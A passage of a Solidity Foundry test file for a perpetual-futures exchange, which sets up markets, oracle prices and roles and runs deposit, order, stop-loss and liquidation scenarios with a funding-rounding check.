\"../contracts/token/SOLToken.sol\";\\nimport \"../contracts/token/USDC.sol\";\\nimport \"../contracts/token/tokenA.sol\";\\nimport \"../contracts/token/tokenB.sol\";\\nimport \"../contracts/token/tokenC.sol\";\\n\\nimport \"../contracts/market/MarketFactory.sol\";\\nimport \"../contracts/deposit/DepositUtils.sol\";\\nimport \"../contracts/oracle/OracleUtils.sol\";\\nimport \"@openzeppelin/contracts/utils/introspection/ERC165Checker.sol\";\\nimport \"../contracts/withdrawal/WithdrawalUtils.sol\";\\nimport \"../contracts/order/Order.sol\";\\nimport \"../contracts/order/BaseOrderUtils.sol\";\\nimport \"../contracts/price/Price.sol\";\\nimport \"../contracts/utils/Debug.sol\";\\nimport \"../contracts/position/Position.sol\";\\nimport \"../contracts/exchange/LiquidationHandler.sol\";\\nimport \"../contracts/utils/Calc.sol\";\\nimport \"@openzeppelin/contracts/utils/math/SignedMath.sol\";\\nimport \"@openzeppelin/contracts/utils/math/SafeCast.sol\";\\n\\n\\ncontract CounterTest is Test, Debug{\\n using SignedMath for int256;\\n using SafeCast for uint256;\\n\\n\\n WNT _wnt; \\n USDC _usdc;\\n SOLToken _sol;\\n tokenA _tokenA;\\n tokenB _tokenB;\\n tokenC _tokenC;\\n\\n RoleStore _roleStore;\\n Router _router;\\n DataStore _dataStore;\\n EventEmitter _eventEmitter;\\n DepositVault _depositVault;\\n OracleStore _oracleStore; \\n Oracle _oracle;\\n DepositHandler _depositHandler;\\n WithdrawalVault _withdrawalVault;\\n WithdrawalHandler _withdrawalHandler;\\n OrderHandler _orderHandler;\\n SwapHandler _swapHandler;\\n LiquidationHandler _liquidationHandler;\\n ReferralStorage _referralStorage;\\n OrderVault _orderVault;\\n ExchangeRouter _erouter;\\n MarketFactory _marketFactory;\\n Market.Props _marketProps1;\\n Market.Props _marketPropsAB;\\n Market.Props _marketPropsBC;\\n Market.Props _marketPropsCwnt;\\n \\n \\n address depositor1;\\n address depositor2;\\n address depositor3;\\n address uiFeeReceiver = address(333);\\n\\n\\n function testGetFundingAmountPerSizeDelta() public{\\n uint result = MarketUtils.getFundingAmountPerSizeDelta(2e15, 1e15+1, true);\\n console2.log(\"result: %d\", result);\\n uint256 correctResult = 2e15 * 1e15 * 1e30 + 1e15; // this is a real round up\\n correctResult = correctResult/(1e15+1);\\n console2.log(\"correctResult: %d\", correctResult);\\n assertTrue(result == 1e15 * 1e30);\\n }\\n\\n \\n\\n function setUp() public {\\n _wnt = new WNT();\\n _usdc = new USDC();\\n _sol = new SOLToken();\\n _tokenA = new tokenA();\\n _tokenB = new tokenB();\\n _tokenC = new tokenC();\\n \\n\\n\\n _roleStore = new RoleStore();\\n _router = new Router(_roleStore);\\n _dataStore = new DataStore(_roleStore);\\n \\n _eventEmitter= new EventEmitter(_roleStore);\\n _depositVault = new DepositVault(_roleStore, _dataStore);\\n _oracleStore = new OracleStore(_roleStore, _eventEmitter);\\n _oracle = new Oracle(_roleStore, _oracleStore);\\n console2.logString(\"_oracle:\"); console2.logAddress(address(_oracle));\\n \\n _depositHandler = new DepositHandler(_roleStore, _dataStore, _eventEmitter, _depositVault, _oracle);\\n console2.logString(\"_depositHandler:\"); console2.logAddress(address(_depositHandler));\\n \\n\\n _withdrawalVault = new WithdrawalVault(_roleStore, _dataStore);\\n _withdrawalHandler = new WithdrawalHandler(_roleStore, _dataStore, _eventEmitter, _withdrawalVault, _oracle);\\n \\n \\n _swapHandler = new SwapHandler(_roleStore);\\n _orderVault = new OrderVault(_roleStore, _dataStore);\\n _referralStorage = new ReferralStorage();\\n\\n\\n \\n _orderHandler = new OrderHandler(_roleStore, _dataStore, _eventEmitter, _orderVault, _oracle, _swapHandler, _referralStorage); \\n _erouter = new ExchangeRouter(_router, _roleStore, _dataStore, _eventEmitter, _depositHandler, _withdrawalHandler, _orderHandler);\\n console2.logString(\"_erouter:\"); console2.logAddress(address(_erouter));\\n _liquidationHandler = new LiquidationHandler(_roleStore, _dataStore, _eventEmitter, _orderVault, _oracle, _swapHandler, _referralStorage);\\n \\n _referralStorage.setHandler(address(_orderHandler), true); \\n\\n /* set myself as the controller so that I can set the address of WNT (wrapped native token contracdt) */\\n _roleStore.grantRole(address(this), Role.CONTROLLER);\\n _roleStore.grantRole(address(this), Role.MARKET_KEEPER);\\n \\n _dataStore.setUint(Keys.MAX_SWAP_PATH_LENGTH, 5); // at most 5 markets in the path\\n \\n _dataStore.setAddress(Keys.WNT, address(_wnt));\\n\\n /* set the token transfer gas limit for wnt as 3200 */\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_wnt)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_usdc)), 32000); \\n \\n\\n /* create a market (SQL, WNT, ETH, USDC) */\\n _marketFactory = new MarketFactory(_roleStore, _dataStore, _eventEmitter);\\n console2.logString(\"_marketFactory:\"); console2.logAddress(address(_marketFactory));\\n _roleStore.grantRole(address(_marketFactory), Role.CONTROLLER); // to save a market's props\\n _roleStore.grantRole(address(_erouter), Role.CONTROLLER); \\n _roleStore.grantRole(address(_depositHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_withdrawalHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_swapHandler), Role.CONTROLLER);\\n _roleStore.grantRole(address(_orderHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_liquidationHandler), Role.CONTROLLER); \\n _roleStore.grantRole(address(_oracleStore), Role.CONTROLLER); // so it can call EventEmitter\\n _roleStore.grantRole(address(_oracle), Role.CONTROLLER); // so it can call EventEmitter\\n _roleStore.grantRole(address(this), Role.ORDER_KEEPER);\\n _roleStore.grantRole(address(this), Role.LIQUIDATION_KEEPER);\\n\\n \\n _marketProps1 = _marketFactory.createMarket(address(_sol), address(_wnt), address(_usdc), keccak256(abi.encode(\"sol-wnt-usdc\"))); \\n _marketPropsAB = _marketFactory.createMarket(address(0), address(_tokenA), address(_tokenB), keccak256(abi.encode(\"swap-tokenA-tokenB\"))); \\n _marketPropsBC = _marketFactory.createMarket(address(0), address(_tokenB), address(_tokenC), keccak256(abi.encode(\"swap-tokenB-tokenC\"))); \\n _marketPropsCwnt = _marketFactory.createMarket(address(0), address(_tokenC), address(_wnt), keccak256(abi.encode(\"swap-tokenC-wnt\"))); \\n \\n \\n _dataStore.setUint(Keys.minCollateralFactorForOpenInterestMultiplierKey(_marketProps1.marketToken, true), 1e25);\\n _dataStore.setUint(Keys.minCollateralFactorForOpenInterestMultiplierKey(_marketProps1.marketToken, false), 1e25);\\n \\n // see fees for the market\\n _dataStore.setUint(Keys.swapFeeFactorKey(_marketProps1.marketToken), 0.05e30); // 5%\\n _dataStore.setUint(Keys.SWAP_FEE_RECEIVER_FACTOR, 0.5e30);\\n _dataStore.setUint(Keys.positionFeeFactorKey(_marketProps1.marketToken), 0.00001234e30); // 2%\\n _dataStore.setUint(Keys.POSITION_FEE_RECEIVER_FACTOR, 0.15e30);\\n _dataStore.setUint(Keys.MAX_UI_FEE_FACTOR, 0.01e30);\\n _dataStore.setUint(Keys.uiFeeFactorKey(uiFeeReceiver), 0.01e30); // only when this is set, one can receive ui fee, so stealing is not easy\\n _dataStore.setInt(Keys.poolAmountAdjustmentKey(_marketProps1.marketToken, _marketProps1.longToken), 1);\\n _dataStore.setInt(Keys.poolAmountAdjustmentKey(_marketProps1.marketToken, _marketProps1.shortToken), 1);\\n _dataStore.setUint(Keys.swapImpactExponentFactorKey(_marketProps1.marketToken), 10e28);\\n _dataStore.setUint(Keys.swapImpactFactorKey(_marketProps1.marketToken, true), 0.99e30);\\n _dataStore.setUint(Keys.swapImpactFactorKey(_marketProps1.marketToken, false), 0.99e30);\\n\\n \\n \\n \\n // set gas limit to transfer a token\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_sol)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_wnt)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_usdc)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenA)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenB)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenC)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketProps1.marketToken)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsAB.marketToken)), 32000);\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsBC.marketToken)), 32000);\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsCwnt.marketToken)), 32000);\\n\\n\\n /* Configure the system parameters/limits here */\\n _dataStore.setUint(Keys.MAX_CALLBACK_GAS_LIMIT, 10000);\\n _dataStore.setUint(Keys.EXECUTION_GAS_FEE_BASE_AMOUNT, 100);\\n _dataStore.setUint(Keys.MAX_ORACLE_PRICE_AGE, 2 hours);\\n _dataStore.setUint(Keys.MIN_ORACLE_BLOCK_CONFIRMATIONS, 3);\\n _dataStore.setUint(Keys.MIN_COLLATERAL_USD, 1e30); // just require $1 as min collateral usd\\n _dataStore.setUint(Keys.reserveFactorKey(_marketProps1.marketToken, true), 5e29); // 50%\\n _dataStore.setUint(Keys.reserveFactorKey(_marketProps1.marketToken, false), 5e29);\\n _dataStore.setUint(Keys.fundingExponentFactorKey(_marketProps1.marketToken), 1.1e30); // 2 in 30 decimals like a square, cube, etc\\n _dataStore.setUint(Keys.fundingFactorKey(_marketProps1.marketToken), 0.0000001e30);\\n _dataStore.setUint(Keys.borrowingFactorKey(_marketProps1.marketToken, true), 0.87e30);\\n _dataStore.setUint(Keys.borrowingFactorKey(_marketProps1.marketToken, false), 0.96e30);\\n _dataStore.setUint(Keys.borrowingExponentFactorKey(_marketProps1.marketToken, true), 2.1e30);\\n _dataStore.setUint(Keys.borrowingExponentFactorKey(_marketProps1.marketToken, false), 2.3e30);\\n _dataStore.setUint(Keys.positionImpactExponentFactorKey(_marketProps1.marketToken), 2e30);\\n _dataStore.setUint(Keys.positionImpactFactorKey(_marketProps1.marketToken, true), 5e22); \\n _dataStore.setUint(Keys.positionImpactFactorKey(_marketProps1.marketToken, false), 1e23);\\n\\n // set the limit of market tokens\\n\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketProps1.marketToken, _marketProps1.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketProps1.marketToken, _marketProps1.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsAB.marketToken, _marketPropsAB.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsAB.marketToken, _marketPropsAB.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsBC.marketToken, _marketPropsBC.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsBC.marketToken, _marketPropsBC.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsCwnt.marketToken, _marketPropsCwnt.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsCwnt.marketToken, _marketPropsCwnt.shortToken), 1000e18);\\n \\n \\n // set max open interest for each market\\n _dataStore.setUint(Keys.maxOpenInterestKey(_marketProps1.marketToken, true), 1e39); // 1B $ \\n _dataStore.setUint(Keys.maxOpenInterestKey(_marketProps1.marketToken, false), 1e39); // 1B $\\n\\n _dataStore.setUint(Keys.maxPnlFactorKey(Keys.MAX_PNL_FACTOR_FOR_WITHDRAWALS, _marketProps1.marketToken, true), 10**29); // maxPnlFactor = 10% for long\\n _dataStore.setUint(Keys.maxPnlFactorKey(Keys.MAX_PNL_FACTOR_FOR_WITHDRAWALS, _marketProps1.marketToken, false), 10**29); // maxPnlFactor = 10% for short\\n // _dataStore.setBool(Keys.cancelDepositFeatureDisabledKey(address(_depositHandler)), true);\\n _dataStore.setBool(Keys.cancelOrderFeatureDisabledKey(address(_orderHandler), uint256(Order.OrderType.MarketIncrease)), true);\\n\\n addFourSigners();\\n address(_wnt).call{value: 10000e18}(\"\");\\n depositor1 = address(0x801);\\n depositor2 = address(0x802);\\n depositor3 = address(0x803);\\n\\n // make sure each depositor has some tokens.\\n _wnt.transfer(depositor1, 1000e18);\\n _wnt.transfer(depositor2, 1000e18);\\n _wnt.transfer(depositor3, 1000e18); \\n _usdc.transfer(depositor1, 1000e18);\\n _usdc.transfer(depositor2, 1000e18);\\n _usdc.transfer(depositor3, 1000e18);\\n _tokenA.transfer(depositor1, 1000e18);\\n _tokenB.transfer(depositor1, 1000e18);\\n _tokenC.transfer(depositor1, 1000e18); \\n\\n printAllTokens(); \\n }\\n\\n error Unauthorized(string);\\n // error Error(string);\\n\\n\\nfunction testLimit() public{\\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(\"Experiment 1 is completed.\"); \\n \\n // console2.log(\"PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP\");\\n \\n key = createMarketSwapOrder(depositor1, address(_wnt), 1e15); // create a deposit at block 3 which is within range (2, 6) \\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(\"Experiment 2 is completed.\"); \\n \\n\\n console2.log(\"\\n\\n depositor 1 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 20e18, 1001e30, 106000000000000, true); // \\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(\"Experiment 3 is completed.\"); \\n \\n \\n\\n console2.log(\"\\n\\n depositor 2 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 110e18, 13e30, 101000000000000, false); // 110 usdc as collateral\\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(\"Experiment 4 is completed.\"); \\n \\n\\n\\n console2.log(\"PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP\");\\n vm.warp(2 days);\\n setIndexTokenPrice(priceParams, 98, 100); // send 20e18 USDC, increase $13.123 in a long position with trigger price 101\\n key = createLimitIncreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 23e18, 1.1234567e30, 101000000000000, true); // collateral token, usdsize, price\\n console2.log(\"a LimitIncrease order created by depositor3 with key: \");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"\\n\\nExecuting the order, exiting moment// rest of code\\n\\n\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"Experiment 5 is completed.\\n\"); \\n \\n\\n // depositor3 creates a LimitDecrease order\\n /*\\n setIndexTokenPrice(priceParams, 120, 125);\\n key = createLimitDecreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 120000000000000, 120000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(\"a LimitIncrease order created by depositor3 with key: \");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"\\n\\nExecuting the order, exiting moment// rest of code\\n\\n\");\\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(\"Experiment 7 for is completed.\"); \\n */\\n}\\n\\nfunction testMarketDecrease() public{\\n \\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(\"Experiment 1 is completed.\"); \\n \\n \\n \\n \\n console2.log(\"\\n\\n depositor 2 deposit into marketProps1\");\\n key = createDepositNoSwap(_marketProps1, depositor2, 100e18, true);\\n _depositHandler.executeDeposit(key, priceParams);\\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor2);\\n printPoolsAmounts();\\n console2.log(\"Experiment 2 is completed.\"); \\n \\n \\n console2.log(\"\\n\\n depositor 1 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 20e18, 1e25, 106000000000000, true); // \\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(\"Experiment 3 is completed.\"); \\n \\n \\n\\n console2.log(\"\\n\\n depositor 2 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 110e18, 1e25, 101000000000000, false); // 110 usdc as collateral\\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(\"Experiment 4 is completed.\"); \\n \\n console2.log(\"********************************************\");\\n\\n // deposit 2 will execute a marketDecreaseOrder now\\n key = createMarketDecreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 70000000000000, 5e23, false) ; // decrease by 5%\\n console2.log(\"a market desced order created with key: \");\\n console2.logBytes32(key);\\n console2.log(\"\\nExecuting the order// rest of code\"); \\n setIndexTokenPrice(priceParams, 60, 65); // we have a profit for a short position\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(\"Experiment 5 is completed.\"); \\n\\n printAllTokens();\\n} \\n\\n \\n\\nfunction testLiquidation() public{\\n // blockrange (2, 6)\\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(\"Experiment 1 is completed.\"); \\n \\n \\n \\n \\n console2.log(\"\\n\\n depositor 2 deposit into marketProps1\");\\n key = createDepositNoSwap(_marketProps1, depositor2, 100e18, true);\\n _depositHandler.executeDeposit(key, priceParams);\\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor2);\\n printPoolsAmounts();\\n console2.log(\"Experiment 2 is completed.\"); \\n \\n \\n console2.log(\"\\n\\n depositor 1 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 10e18, 1e25, 106000000000000, true);\\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(\"Experiment 3 is completed.\"); \\n \\n \\n\\n console2.log(\"\\n\\n depositor 2 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.shortToken, 100e18, 1e25, 101000000000000, false);\\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.shortToken, false);\\n console2.log(\"Experiment 4 is completed.\"); \\n \\n \\n\\n // deposit 2 will execute a marketDecreaseOrder now\\n key = createMarketDecreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.shortToken, 106000000000000, 5e23, false) ; // decrease by 5%\\n console2.log(\"a market desced order created with key: \");\\n console2.logBytes32(key);\\n console2.log(\"\\nExecuting the order// rest of code\"); \\n setIndexTokenPrice(priceParams, 84, 90);\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.shortToken, false);\\n console2.log(\"Experiment 5 is completed.\"); \\n \\n \\n\\n \\n // depositor3 will execute a LimitIncrease Order now\\n key = createMarketIncreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 20e18, 200e30, 101000000000000, true); // collateral token, usdsize, price\\n console2.log(\"a LimitIncrease order created by depositor3 with key: \");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"\\n\\nExecuting the order, exiting moment// rest of code\\n\\n\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"Experiment 6 is completed.\\n\"); \\n \\n\\n // depositor3 creates a LimitDecrease order\\n setIndexTokenPrice(priceParams, 120, 125);\\n key = createLimitDecreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 120000000000000, 120000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(\"a LimitIncrease order created by depositor3 with key: \");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"\\n\\nExecuting the order, exiting moment// rest of code\\n\\n\");\\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(\"Experiment 7 for is completed.\"); \\n \\n // depositor3 creates a stopLossDecrease order\\n setIndexTokenPrice(priceParams, 97, 99);\\n key = createStopLossDecrease(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 95000000000000, 92000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(\"a StopLossDecrease order created by depositor3 with key: \");\\n console2.logBytes32(key);\\n // Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n\\n console2.log(\"\\n\\nExecuting the order, exiting moment// rest of code\\n\\n\");\\n _orderHandler.executeOrder(key, priceParams);\\n console2.log(\"Experiment 8 is completed.\"); \\n \\n \\n console2.log(\"\\n\\n*************************************************\\n\\n\");\\n\\n\\n // depositor3 creates a Liquidation order\\n setIndexTokenPrice(priceParams, 75, 75);\\n console2.log(\"Liquidate a position// rest of code\");\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n _liquidationHandler.executeLiquidation(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true, priceParams);\\n console2.log(\"Experiment 9 is completed.\"); \\n \\n\\n // printPoolsAmounts();\\n printAllTokens();\\n\\n \\n \\n \\n}\\n\\nfunction printAllTokens() startedCompleted(\"printAllTokens\") public\\n{\\n console2.log(\"\\nTokens used in this test:\");\\n console2.log(\"_wnt: \"); console2.logAddress(address(_wnt));\\n console2.log(\"_usdc: \"); console2.logAddress(address(_usdc));\\n console2.log(\"_sol: \"); console2.logAddress(address(_sol));\\n console2.log(\"_tokenA: \"); console2.logAddress(address(_tokenA));\\n console2.log(\"_tokenB: \"); console2.logAddress(address(_tokenB));\\n console2.log(\"_tokenC: \"); console2.logAddress(address(_tokenC));\\n console2.logString(\"test contract address:\"); console2.logAddress(address(this));\\n \\n console2.log(\"_marketProps1 market token: \"); console2.logAddress(address(_marketProps1.marketToken));\\n console2.log(\"_marketPropsAB market token: \"); console2.logAddress(address(_marketPropsAB.marketToken));\\n console2.log(\"_marketPropsBC market token: \"); console2.logAddress(address(_marketPropsBC.marketToken));\\n console2.log(\"_marketProps1Cwnt market token: \"); console2.logAddress(address(_marketPropsCwnt.marketToken));\\n console2.log(\"\\n\");\\n \\n \\n}\\n\\n\\nfunction printMarketTokenAmount() public \\n{ console2.log(\"Market token address: \");\\n console2.logAddress(address(_marketProps1.marketToken));\\n console2.log(\"depositor1 market token amount: %d\", IERC20(_marketProps1.marketToken).balanceOf(depositor1));\\n console2.log(\"depositor2 market token amount: %d\", IERC20(_marketProps1.marketToken).balanceOf(depositor2));\\n console2.log(\"depositor3 market token amount: %d\", IERC20(_marketProps1.marketToken).balanceOf(depositor3));\\n}\\n\\nfunction printLongShortTokens(address account) public\\n{\\n console2.log(\"balance for \"); console2.logAddress(account);\\n console2.log(\"_wnt balance:\", _wnt.balanceOf(account));\\n console2.log(\"usdc balance:\", _usdc.balanceOf(account));\\n}\\n\\n\\n\\n\\nfunction addFourSigners() private {\\n _oracleStore.addSigner(address(901));\\n _oracleStore.addSigner(address(902)); \\n _oracleStore.addSigner(address(903)); \\n _oracleStore.addSigner(address(904)); \\n}\\n\\n\\nfunction setIndexTokenPrice(OracleUtils.SetPricesParams memory priceParams, uint256 minP, uint256 maxP) public\\n{\\n uint256 mask1 = ~uint256(type(uint96).max); // (32*3 of 1's)\\n console2.logBytes32(bytes32(mask1));\\n\\n uint256 minPrice = minP;\\n minPrice = minPrice << 32 | minP;\\n minPrice = minPrice << 32 | minP;\\n\\n uint256 maxPrice = maxP;\\n maxPrice = maxPrice << 32 | maxP;\\n maxPrice = maxPrice << 32 | maxP;\\n\\n priceParams.compactedMinPrices[0] = (priceParams.compactedMinPrices[0] & mask1) | minPrice;\\n priceParams.compactedMaxPrices[0] = (priceParams.compactedMaxPrices[0] & mask1) | maxPrice;\\n}\\n\\n\\nfunction createSetPricesParams() public returns (OracleUtils.SetPricesParams memory) {\\n uint256 signerInfo = 3; // signer 904\\n signerInfo = signerInfo << 16 | 2; // signer 903\\n signerInfo = signerInfo << 16 | 1; // signer 902\\n signerInfo = signerInfo << 16 | 3; // number of singers\\n // will read out as 902, 903, 904 from the lowest first\\n\\n // the number of tokens, 6\\n address[] memory tokens = new address[](6);\\n tokens[0] = address(_sol);\\n tokens[1] = address(_wnt);\\n tokens[2] = address(_usdc);\\n tokens[3] = address(_tokenA);\\n tokens[4] = address(_tokenB);\\n tokens[5] = address(_tokenC);\\n\\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 64*4 for one element, so need two elements \\n uint256[] memory compactedMinOracleBlockNumbers = new uint256[](2);\\n compactedMinOracleBlockNumbers[0] = block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n\\n compactedMinOracleBlockNumbers[1] = block.number+1;\\n compactedMinOracleBlockNumbers[1] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n \\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 64*4 for one element, so need two elements \\n \\n uint256[] memory compactedMaxOracleBlockNumbers = new uint256[](2);\\n compactedMaxOracleBlockNumbers[0] = block.number+5; \\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5;\\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5; \\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5; \\n\\n compactedMaxOracleBlockNumbers[1] = block.number+5; \\n compactedMaxOracleBlockNumbers[1] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5;\\n\\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 64*4 for one element, so need two elements \\n uint256[] memory compactedOracleTimestamps = new uint256[](2);\\n compactedOracleTimestamps[0] = 9;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 8;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 7;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 7;\\n \\n compactedOracleTimestamps[1] = 9;\\n compactedOracleTimestamps[1] = compactedOracleTimestamps[0] << 64 | 8;\\n \\n\\n // must be equal to the number of tokens, 8 for each, so 8*6= 48, only need one element\\n uint256[] memory compactedDecimals = new uint256[](1);\\n compactedDecimals[0] = 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 